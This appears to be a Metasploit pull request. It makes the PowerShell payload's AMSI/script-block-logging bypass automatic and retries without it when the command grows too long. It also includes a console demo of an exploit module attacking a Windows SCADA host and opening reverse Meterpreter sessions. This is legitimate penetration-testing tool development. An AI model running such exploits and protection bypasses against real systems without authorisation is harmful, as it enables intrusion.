### PR TITLE
Remove the AMSI bypass when necessary

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -370,7 +370,7 @@ GEM
       rex-arch
     rex-ole (0.1.7)
       rex-text
-    rex-powershell (0.1.93)
+    rex-powershell (0.1.94)
       rex-random_identifier
       rex-text
       ruby-rc4

--- a/lib/msf/core/exploit/java_deserialization.rb
+++ b/lib/msf/core/exploit/java_deserialization.rb
@@ -41,7 +41,7 @@ module Exploit::JavaDeserialization
 
     if payload.platform.platforms == [Msf::Module::Platform::Windows]
       if [ Rex::Arch::ARCH_X86, Rex::Arch::ARCH_X64 ].include? payload.arch.first
-        command = cmd_psh_payload(payload.encoded, payload.arch.first, { remove_comspec: true, encode_final_payload: true })
+        command = cmd_psh_payload(payload.encoded, payload.arch.first, { remove_comspec: true })
       elsif payload.arch.first == Rex::Arch::ARCH_CMD
         command = payload.encoded
       end

--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -9,7 +9,7 @@ module Exploit::Powershell
       [
         OptBool.new('Powershell::persist', [true, 'Run the payload in a loop', false]),
         OptInt.new('Powershell::prepend_sleep', [false, 'Prepend seconds of sleep']),
-        OptBool.new('Powershell::prepend_protections_bypass', [true, 'Prepend AMSI/SBL bypass', true]),
+        OptEnum.new('Powershell::prepend_protections_bypass', [true, 'Prepend AMSI/SBL bypass', 'auto', %w[ auto true false ]]),
         OptBool.new('Powershell::strip_comments', [true, 'Strip comments', true]),
         OptBool.new('Powershell::strip_whitespace', [true, 'Strip whitespace', false]),
         OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', true]),
@@ -230,7 +230,8 @@ module Exploit::Powershell
       opts[opt] = datastore["Powershell::#{opt}"] if opts[opt].nil?
     end
 
-    if opts.delete(:prepend_protections_bypass)
+    prepend_protections_bypass = opts.delete(:prepend_protections_bypass)
+    if %w[ auto true ].include?(prepend_protections_bypass)
       opts[:prepend] = bypass_powershell_protections
     end
 
@@ -239,7 +240,16 @@ module Exploit::Powershell
     end
 
     template_path = Rex::Powershell::Templates::TEMPLATE_DIR
-    command = Rex::Powershell::Command.cmd_psh_payload(pay, payload_arch, template_path, opts)
+    begin
+      command = Rex::Powershell::Command.cmd_psh_payload(pay, payload_arch, template_path, opts)
+    rescue Rex::Powershell::Exceptions::PowershellCommandLengthError => e
+      raise unless prepend_protections_bypass == 'auto'
+
+      # if prepend protections bypass is automatic, try it first but if the size is too large, turn it off and try again
+      opts.delete(:prepend)
+      command = Rex::Powershell::Command.cmd_psh_payload(pay, payload_arch, template_path, opts)
+    end
+
     vprint_status("Powershell command length: #{command.length}")
 
     command


### PR DESCRIPTION
This builds on #15254 which switched to always prepending the now obfuscated AMSI bypass. In some cases this was breaking modules because the generated command would be too large. This was the case when the encode_final_payload was enabled which base64-encoded the whole command and significantly increased the size.

These changes fix Java deserialization modules targeting Windows that need to generate Powershell commands in two ways.

1. The `encode_final_payload` option is removed. It can be set by the user now, but it's not forced by the mixin. Since #14732 was landed, the modified YSoSerial payloads that are used by that code path will properly treat the entire string as an operating system command making it unnecessary to encode it again.
2. The protections bypass are now automatically prepended by default instead of always prepended by default. If the module catches an exception that the generated command is too large, it will reattempt to generate the command without the protections when it's set to automatic. This will be the case when the final payload is encoded which is used by some modules.

## Verification

The `exploit/multi/scada/inductive_ignition_rce` module is a good use case for this. Prior to these changes, the exploit would fail with `[-] Exploit failed: Rex::RuntimeError Powershell command length is greater than the command line maximum (8192 characters)`. Now the exploit should work just fine.

- [ ] Use the `exploit/multi/scada/inductive_ignition_rce` module, targeting a Windows system
- [ ] Use all of the default options, only set necessary options like rhost, lhost etc.
- [ ] Run the module, get a shell
- [ ] Run `set Powershell::encode_final_payload true`, rerun the module, see it succeed
    * In this case the automatic handling will regenerate the command without the AMSI bypass
- [ ] Run `set Powershell::prepend_protections_bypass true`, rerun the module, see it fail
    * In this case the automatic handling is disabled and the generated command will fail

## Demo

```
msf6 exploit(multi/scada/inductive_ignition_rce) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.35:8088 - Attacking Windows target
[*] 192.168.159.35:8088 - Detected version 8.0.7
[*] 192.168.159.35:8088 - Sending payload...
[+] 192.168.159.35:8088 - Success, shell incoming!
[*] Sending stage (175174 bytes) to 192.168.159.35
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.35:49218 ) at 2021-10-21 17:22:18 -0400

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.35 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(multi/scada/inductive_ignition_rce) > set Powershell::encode_final_payload true
Powershell::encode_final_payload => true
msf6 exploit(multi/scada/inductive_ignition_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.35:8088 - Attacking Windows target
[*] 192.168.159.35:8088 - Detected version 8.0.7
[-] Exploit failed: Rex::Powershell::Exceptions::PowershellCommandLengthError Powershell command length is greater than the command line maximum (8192 characters)
[*] Exploit completed, but no session was created.
msf6 exploit(multi/scada/inductive_ignition_rce) > set Powershell::prepend_protections_bypass auto
Powershell::prepend_protections_bypass => auto
msf6 exploit(multi/scada/inductive_ignition_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.35:8088 - Attacking Windows target
[*] 192.168.159.35:8088 - Detected version 8.0.7
[*] 192.168.159.35:8088 - Sending payload...
[+] 192.168.159.35:8088 - Success, shell incoming!
[*] Sending stage (175174 bytes) to 192.168.159.35
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.35:49219 ) at 2021-10-21 17:22:43 -0400

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.35 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(multi/scada/inductive_ignition_rce) >
```

Fixes #15704
Requires rapid7/rex-powershell#38
